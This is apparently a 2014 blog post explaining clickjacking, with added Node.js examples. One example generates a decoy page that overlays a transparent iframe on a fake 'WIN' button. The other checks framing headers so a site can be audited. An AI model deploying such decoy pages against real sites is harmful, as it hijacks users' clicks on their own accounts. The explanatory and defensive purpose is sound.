October 14, 2014 by

Clickjacking: A Short Introduction

Although clickjacking has been around for a while, it is not a technique many people are aware of, even though most of us have come into contact with it. Clickjacking is, in simple terms, a way of tricking a user into clicking on something they never intended to click. That click is then put to malicious use, such as spreading a malicious website across social media or obtaining the user's account details.

HOW DOES IT WORK? 

Let's take Facebook as an example. You see a post with a link that hundreds or even thousands of people have liked, so you think to yourself: "What's all this fuss about? Let me find out!" You click on the link in the post, which takes you to a site where you can win a free iPad. Awesome! Free stuff! All they need from you is to click the >> WIN << button and it's yours. So little work for an iPad!

After you click the button, nothing happens. Seemingly. Behind the scenes, you actually clicked the Like button (or the Share button, or any other link the attacker chose) and helped the post gain even more exposure. That button is the real one: the attacker's page loads the target site inside an iframe, positions the iframe so the Like button sits exactly over the decoy WIN button, and makes the iframe transparent with CSS, so you never see it. Because your browser sends your existing Facebook session cookies along with the framed page, the click is registered against your own account. (Browsers that now default cookies to SameSite=Lax withhold them from cross-site frames, which blunts this against such sites, but any site whose cookies are marked SameSite=None and which sends no anti-framing headers is still exposed.)
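The overlay described above, as an added example that is not part of the original post: the attacker has to know where the Like button sits inside the framed page and shift the iframe so that point lands on the decoy. The target URL, the button positions and the pixel sizes below are constructed values, not measurements of Facebook or any other real site; the code is plain Node.js with no dependencies.

```javascript
// Added example (not from the original post): the geometry behind the
// "free iPad" page. The target site, its button position and the decoy's
// position are all constructed values, not measurements of any real site.
// Node.js, no dependencies; buildDecoyPage returns the attacker's HTML.

// Where the real Like button sits inside the framed target page, in CSS
// pixels from that page's top-left corner (constructed sample).
const TARGET_BUTTON = { x: 412, y: 268, width: 80, height: 24 };

// Where the decoy WIN button sits on the attacker's own page (constructed).
const DECOY_BUTTON = { x: 300, y: 200, width: 80, height: 24 };

// Shift the iframe by (decoy - target) so the framed page's button lands
// exactly on top of the decoy. Negative values move the framed page up/left.
function overlayOffset(target, decoy) {
  return { left: decoy.x - target.x, top: decoy.y - target.y };
}

// Given a click at attacker-page coordinates (x, y), would it land on the
// framed target button? Translate into the iframe's coordinate space first.
function hitsTargetButton(x, y, target, offset) {
  const fx = x - offset.left;
  const fy = y - offset.top;
  return fx >= target.x && fx < target.x + target.width &&
         fy >= target.y && fy < target.y + target.height;
}

// Build the attacker page. The iframe is stacked above the decoy (higher
// z-index) and hidden with opacity: 0, which, unlike display: none or
// visibility: hidden, still lets the element receive clicks. The victim
// sees the decoy; the browser delivers the click to the framed Like button.
function buildDecoyPage(targetUrl, target, decoy) {
  const { left, top } = overlayOffset(target, decoy);
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Win a free iPad!</title>
<style>
  body { margin: 0; }
  #decoy { position: absolute; left: ${decoy.x}px; top: ${decoy.y}px;
           width: ${decoy.width}px; height: ${decoy.height}px; z-index: 1; }
  #target { position: absolute; left: ${left}px; top: ${top}px;
            width: 1200px; height: 900px; border: 0;
            opacity: 0; z-index: 2; }
</style></head>
<body>
  <button id="decoy">&gt;&gt; WIN &lt;&lt;</button>
  <iframe id="target" src="${targetUrl}"></iframe>
</body></html>`;
}

// Hypothetical target URL; a real campaign would frame the page carrying
// the Like/Share button of the post it wants to spread.
const page = buildDecoyPage('https://social.example/post/123', TARGET_BUTTON, DECOY_BUTTON);
const offset = overlayOffset(TARGET_BUTTON, DECOY_BUTTON);
const centre = {
  x: DECOY_BUTTON.x + DECOY_BUTTON.width / 2,
  y: DECOY_BUTTON.y + DECOY_BUTTON.height / 2,
};
console.log(offset, hitsTargetButton(centre.x, centre.y, TARGET_BUTTON, offset));
// { left: -112, top: -68 } true
```

Note that nothing in this page runs JavaScript in the victim's browser: an iframe and a few lines of CSS are the whole attack. If the framed site sends an anti-framing header, the browser leaves the iframe empty and the click lands on nothing.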

This sort of clickjacking attack is relatively harmless. A double-click campaign, however, can propagate the post with the first click while letting the second click go through to the WIN button, which may then take you to a site serving malware. Many of your friends will click the clickjacked link too (since you shared or liked it and they trust you), and so will their friends, and so on, like a chain reaction.

Below is a video depicting another example (Digg):

How can you stay protected?

You can use browser extensions such as NoScript (guide) or ScriptSafe, and use common sense: no one on the internet will give you a free iPad or anything similar. Bear in mind that a basic clickjacking page needs no JavaScript at all, just an iframe and a few lines of CSS, so blocking scripts alone does not stop it; what protects you in NoScript is its ClearClick feature, which warns when a click is about to land on framed content that is hidden or obscured. The real fix belongs on the site being framed: any site with a button worth hijacking should send an X-Frame-Options: DENY (or SAMEORIGIN) header, or a Content-Security-Policy header with a frame-ancestors directive, so that browsers refuse to render the page inside another site's frame.
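To make the server-side fix concrete, here is an added example (not from the original post) that takes a site's response headers and decides whether a given origin is allowed to frame it. The header sets and origins are constructed samples; the CSP matching is a simplified version of the frame-ancestors rules (no path handling, and a source that names no port does not check the framer's port). Node.js, no dependencies.

```javascript
// Added example (not from the original post): evaluate whether a site's
// response headers stop another origin from framing it. Node.js, no
// dependencies. The header sets and origins below are constructed samples.

// Split an origin string into the parts that matter for a same-origin check.
function parseOrigin(origin) {
  const u = new URL(origin);
  const scheme = u.protocol.slice(0, -1);
  const port = u.port || (scheme === 'https' ? '443' : scheme === 'http' ? '80' : '');
  return { scheme, host: u.hostname.toLowerCase(), port };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Pull the frame-ancestors source list out of a Content-Security-Policy
// value, or return null when the directive is absent.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Does one frame-ancestors source expression cover the framing origin?
// Handles 'none', 'self', '*', scheme-only sources ("https:"), exact hosts
// and leading "*." host wildcards. Simplification: when the source names no
// port, the framer's port is not checked.
function sourceMatches(source, framer, page) {
  const src = source.replace(/^'|'$/g, '');
  if (src === 'none') return false;
  if (src === 'self') return sameOrigin(framer, page);
  if (src === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framer.scheme === src.slice(0, -1);
  let scheme = null;
  let hostPort = src;
  const i = src.indexOf('://');
  if (i !== -1) {
    scheme = src.slice(0, i);
    hostPort = src.slice(i + 3);
  }
  if (scheme && scheme !== framer.scheme) return false;
  const [host, port] = hostPort.split(':');
  if (port && port !== '*' && port !== framer.port) return false;
  if (host.startsWith('*.')) return framer.host.endsWith(host.slice(1));
  return host === framer.host;
}

// Decide whether framerOrigin may embed pageOrigin given the page's headers.
// When a CSP frame-ancestors directive is present browsers enforce it and
// ignore X-Frame-Options; otherwise DENY / SAMEORIGIN apply; any other or
// missing value (including the obsolete ALLOW-FROM) leaves the page framable.
function framingAllowed(headers, framerOrigin, pageOrigin) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;
  const framer = parseOrigin(framerOrigin);
  const page = parseOrigin(pageOrigin);
  const sources = frameAncestors(h['content-security-policy']);
  if (sources) return sources.some((s) => sourceMatches(s, framer, page));
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return sameOrigin(framer, page);
  return true;
}

// Constructed header sets: the bare response the attack relies on, the
// classic fix, a CSP that also admits a partner's subdomains, and a CSP
// 'none' that overrides a looser X-Frame-Options on the same response.
const SAMPLE_HEADERS = {
  unprotected: { 'Content-Type': 'text/html' },
  xfo: { 'Content-Type': 'text/html', 'X-Frame-Options': 'SAMEORIGIN' },
  csp: {
    'Content-Type': 'text/html',
    'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.partner.example",
  },
  cspDeny: {
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': "frame-ancestors 'none'",
  },
};

// Try the attacker's origin against each header set.
function report(framerOrigin, pageOrigin) {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLE_HEADERS)) {
    out[name] = framingAllowed(headers, framerOrigin, pageOrigin);
  }
  return out;
}

console.log(report('https://free-ipad.example', 'https://social.example'));
// { unprotected: true, xfo: false, csp: false, cspDeny: false }
```

The same function is a quick audit tool: fetch your own pages, feed the response headers in with an origin you do not control, and anything that comes back true can be wrapped in the iframe from the previous section.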


About the author


LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients' engagement experience while providing a strategic and integrated array of services to minimize risk and disruption while protecting your brand.
